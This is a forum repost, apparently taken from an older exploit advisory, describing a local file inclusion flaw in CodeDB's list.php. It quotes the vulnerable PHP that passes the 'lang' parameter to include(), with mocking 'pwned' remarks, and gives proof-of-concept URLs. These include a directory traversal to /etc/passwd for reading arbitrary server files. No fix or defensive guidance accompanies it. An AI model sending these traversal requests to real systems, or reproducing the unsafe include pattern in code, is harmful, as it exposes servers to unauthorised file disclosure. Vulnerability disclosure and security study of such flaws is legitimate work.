• 设为首页
  • 收藏本站
  • 积分充值
  • VIP赞助
  • 手机版
  • 微博
  • 微信
    微信公众号 添加方式:
    1:搜索微信号(888888
    2:扫描左侧二维码
  • 快捷导航
    福建二哥 门户 查看主题

    CodeDB (list.php lang) Local File Inclusion Vulnerability

    发布者: 雪落无声 | 发布时间: 2025-6-28 22:47| 查看数: 49| 评论数: 0|帖子模式

    ###############################################################################
    #
    #   Name    :   CodeDB (list.php lang) Local File Inclusion Vulnerability
    #   Author  :   cOndemned
    #   Greetz  :   ZaBeaTy, str0ke, irk4z, GregStar, doctor, Adish, Avantura ;*
    #
    ###############################################################################

    Source :

        // list.php
       
        2.  $lang = htmlspecialchars($_GET['lang']);            // ok, but.... for what ? lol
       
        7.  if(file_exists('templates/'.$lang.'_middle.php'))   // We'll have to cut off rest of filename & extension
    8.      include('templates/'.$lang.'_middle.php');      // Ekhm... pwned ;d
       
       
    Proof of Concept :

        http://[host]/[codeDB_path]/list.php?lang=../readme.txt
        http://[host]/[codeDB_path]/list.php?lang=../../../../etc/passwd
        http://[host]/[codeDB_path]/list.php?lang=../[local_file]

       
    EoF.  

    来源:https://www.jb51.net/hack/5690.html
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

    最新评论

    QQ Archiver 手机版 小黑屋 福建二哥 ( 闽ICP备2022004717号|闽公网安备35052402000345号 )

    Powered by Discuz! X3.5 © 2001-2023

    快速回复 返回顶部 返回列表